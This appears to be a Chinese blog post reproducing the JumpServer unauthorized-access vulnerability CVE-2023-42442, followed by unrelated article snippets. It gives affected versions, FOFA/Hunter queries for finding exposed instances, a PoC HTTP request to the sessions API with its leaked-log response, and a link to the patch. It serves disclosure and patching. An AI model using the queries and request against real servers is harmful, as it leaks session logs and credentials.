【漏洞复现】JumpServer未授权访问漏洞(CVE-2023-42442)

文章目录

  • 前言
  • 声明
  • 一、JumpServer简介
  • 二、漏洞描述
  • 三、影响范围
  • 四、资产搜索
  • 五、漏洞复现
  • 六、修复建议


前言

JumpServer的权限管理存在缺陷,未经授权的远程攻击者可以下载历史会话连接期间的所有操作日志,可导致敏感信息泄漏。

声明

请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

一、JumpServer简介

JumpServer是一种开源的堡垒机(Bastion Host)和权限管理系统,用于管理和控制远程服务器访问权限。它提供了一种安全的方式,通过跳板机(JumpServer)来管理和监控对目标服务器的访问。


二、漏洞描述

JumpServer是一款开源的堡垒机和权限管理系统,旨在帮助企业实现对服务器和网络设备的安全管理和访问控制。JumpServer的权限管理存在缺陷,未经授权的远程攻击者可以下载历史会话连接期间的所有操作日志。经过分析和研判,该漏洞利用难度低,可导致敏感信息泄漏。


三、影响范围

  • 3.0.0 <= version <= 3.5.4
  • 3.6.0 <= version <= 3.6.3

四、资产搜索

hunter语法:app.name="JumpServer"
FOFA:app="JumpServer-堡垒机"
在这里插入图片描述

五、漏洞复现

漏洞POC

请求包

GET /api/v1/terminal/sessions/ HTTP/1.1
Host: XX.XX.XX.XX
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,ak;q=0.8
Cookie: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX; jms_sessionid=tl4l16mf5x23mg0g2ku5npf2q2apru18
Connection: close

响应包

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 20 Sep 2023 02:09:54 GMT
Content-Type: application/json
Content-Length: 759031
Connection: close
Vary: Accept, Accept-Language, Cookie
Allow: GET, POST, PUT, PATCH, DELETE, HEAD, OPTIONS
X-Frame-Options: DENY
Content-Language: zh-hans
X-Content-Type-Options: nosniff
Referrer-Policy: same-origin
Set-Cookie: jms_sessionid=tl4l16mf5x23mg0g2ku5npf2q2apru18; HttpOnly; Path=/; SameSite=Lax[{"id":"xxxx","user":"xxx",.....}]

在这里插入图片描述

六、修复建议

官方已发布修复方案,受影响的用户建议联系官方获取安全补丁。https://github.com/jumpserver/jumpserver/security/advisories/GHSA-633x-3f4f-v9rw

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/83907.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

Mybatis懒加载

懒加载是什么&#xff1f; 按需加载所需内容&#xff0c;当调用到关联的数据时才与数据库交互否则不交互&#xff0c;能大大提高数据库性能&#xff0c;并不是所有场景下使用懒加载都能提高效率。 Mybatis懒加载&#xff1a;resultMap里面的association、collection有延迟加载功…

cmake:target属性POSITION_INDEPENDENT_CODE和INTERFACE_POSITION_INDEPENDENT_CODE的区别

cmake定义的target有两个名字类似的属性&#xff1a;POSITION_INDEPENDENT_CODE和INTERFACE_POSITION_INDEPENDENT_CODE&#xff0c;本文说明它们的含义和区别 -fPIC 介绍POSITION_INDEPENDENT_CODE和INTERFACE_POSITION_INDEPENDENT_CODE属性前先介绍一下-fPIC编译选项。 -f…

CloudCompare 二次开发(14)——高斯滤波

目录 一、概述二、代码集成三、结果展示一、概述 使用CloudCompare与PCL的混合编程实现点云高斯滤波。高斯滤波的算法原理见:PCL 高斯滤波。 二、代码集成 1、mainwindow.h文件public中添加: void doActionPCLGassFilter(); // 高斯滤波2、mainwindow.cpp文件中添加头文…

视频文本检索(ICCV 23):Unified Coarse-to-Fine Alignment for Video-Text Retrieval

论文作者&#xff1a;Ziyang Wang,Yi-Lin Sung,Feng Cheng,Gedas Bertasius,Mohit Bansal 作者单位&#xff1a;UNC Chapel Hill 论文链接&#xff1a;http://arxiv.org/abs/2309.10091v1 项目链接&#xff1a;https://github.com/Ziyang412/UCoFiA 内容简介&#xff1a; …

音视频 SDL简介

一、SDL简介 SDL&#xff08;Simple DirectMedia Layer&#xff09;是一套开放源代码的跨平台多媒体开发库&#xff0c;使用C语言写成。SDL提供了数种控制图像、声音、输出入的函数&#xff0c;让开发者只要用相同或是相似的代码就可以开发出跨多个平台&#xff08;Linux、Win…

Win10专业版开启远程桌面

Win10专业版开启远程桌面 方法一&#xff1a; 一、按“Win R”键&#xff0c;然后输入“sysdm.cpl”并按下回车键打开系统属性。 二、选择“远程”选项卡&#xff0c;在远程桌面中勾选“允许远程连接到此计算机”就可以开启远程桌面&#xff1b; 方法二&#xff1a; 一、打…

Rxjs操作符理解篇

创建运算符 ajax bindCallback: 把回调 API 转化为返回 Observable 的函数 bindNodeCallback: 把 Node.js 式回调 API 转换为返回 Observable 的函数。 defer empty from fromEvent fromEventPattern generate interval of range throwError timer iif 调度器 queue: 接受三…

【Python深度学习】深度学习框架Tensorflow、Pytorch介绍

深度学习已经成为了人工智能领域的一股重要力量&#xff0c;而深度学习框架则是在这个领域中进行研究和应用的必备工具。常见的深度学习框架包括TensorFlow、PyTorch、Keras、Theano和Caffe等&#xff0c;其中TensorFlow和PyTorch是最受欢迎的两个框架。本文将着重介绍这两个框…

IP代理与加速器:理解它们的区别与共同点

在网络使用过程中&#xff0c;我们经常会遇到需要提高访问速度或保护隐私的需求。IP代理和加速器都是常见的应对方案&#xff0c;但它们在工作原理和应用场景上存在一些区别。本文将为您深入探讨IP代理和加速器的异同&#xff0c;帮助您更好地理解它们的作用和适用情况&#xf…

评价指标分类

声明 本文是学习GB-T 42874-2023 城市公共设施服务 城市家具 系统建设实施评价规范. 而整理的学习笔记,分享出来希望更多人受益,如果存在侵权请及时联系我们 1 范围 本文件确立了城市家具系统建设实施的评价原则、评价流程&#xff0c;给出了评价指标&#xff0c;描述了 方…

visual studio 安装包丢失或损坏

visual studio 安装包丢失或损坏 如下图所示为vs2015报错信息。 解决方案&#xff1a; 找到镜像文件或者压缩包的解压位置&#xff1b; 路径&#xff1a;C:\Users\Administrator\Desktop\packages 复制该路径至上图的请提供搜索包的位置。

如何自动获取短信验证码?

点击下方关注我&#xff0c;然后右上角点击...“设为星标”&#xff0c;就能第一时间收到更新推送啦~~~ 这篇文章通过解决实际项目开发中遇到的如何自动获取短信验证码的问题&#xff0c;进一步讲述在Java中如何使用正则。 Java中如何使用正则 Java中正则相关类位于java.util.r…

【Vue】Vue中lauch.js的详细介绍,各个参数的内涵

"lauch.js" 在 Vue 中是一个启动文件&#xff0c;通常用来创建 Vue 实例并配置一些默认设置。 下面是常见的 "lauch.js" 参数及其意义&#xff1a; el&#xff1a;表示要挂载的元素&#xff0c;通常是一个字符串或者一个 DOM 对象。 router&#xff1a;表…

新款 锐科达 SV-2102VP SIP广播音频模块 RTP流音频广播

新款 锐科达 SV-2102VP SIP广播音频模块 RTP流音频广播 SV-2102VP和 SV-2103VP网络音频模块是一款通用的独立SIP音频功能模块&#xff0c;可以轻松地嵌入到OEM产品中。该模块对来自网络的SIP协议及RTP音频流进行编解码。 本系列模块可以应用于以下领域&#xff1a; • 各种商…

1.6python基础语法——输出

作用&#xff1a;程序输出内容给用户 1&#xff09;格式化符号 格式符号转换%s字符串%d有符号的十进制整数%f浮点数%c字符%u无符号十进制整数%o八进制整数%x十六进制整数&#xff08;小写ox&#xff09;%X十六进制整数&#xff08;大写OX&#xff09;%e科学计数法&#xff08…

selenium自动化测试-登录网站用户

昨天学习了selenium自动化测试工具的入门&#xff0c;知道了Selenium是用于自动化控制浏览器做各种操作&#xff0c;打开网页&#xff0c;点击按钮&#xff0c;输入表单等等。 今天学习通过selenium自动化测试工具自动登录某网站用户操作。 第一步&#xff1a;确定目标网址 …

【C++进阶】:哈希

哈希 一.unordered_map二.底层结构1.哈希概念2.解决哈希冲突1.闭散列2.开散列 在C98中&#xff0c;STL提供了底层为红黑树结构的一系列关联式容器&#xff0c;在查询时效率可达到 l o g 2 N log_2N log2​N&#xff0c;即最差情况下需要比较红黑树的高度次&#xff0c;当树中的…

【C++面向对象侯捷】4.参数传递与返回值

文章目录 构造函数放在 private&#xff1f;>单例模式 const member functions(常量成员函数) > 不会改变数据内容的&#xff0c;加上const参数传递&#xff1a;pass by value vs. pass by reference(to const)【最好传引用&#xff0c;占用空间小】返回值传递&#xff1…

Spire.OCR for .NET 1.9.0 Crack

Spire.OCR for .NET 是一个专业的 OCR 库&#xff0c;用于从 JPG、PNG、GIF、BMP 和 TIFF 格式的图像中读取文本。开发人员可以轻松地在 C# 和 VB.NET 的 .NET 应用程序中添加 OCR 功能。它支持常用的图像格式&#xff0c;并提供从图像中​​读取多个字符和字体、粗体和斜体样式…

vue3 知识点(二)

1: 隐藏dom节点 ​ v-if 是注释掉dom节点 ​ v-show 只是改变css样式&#xff1a;display:none&#xff0c;如果对性能有高要求的话&#xff0c;可以使用v-show 2: 点击事件 click 可以把click 改成动态的 [event] <a-button type"primary" [event]"hand…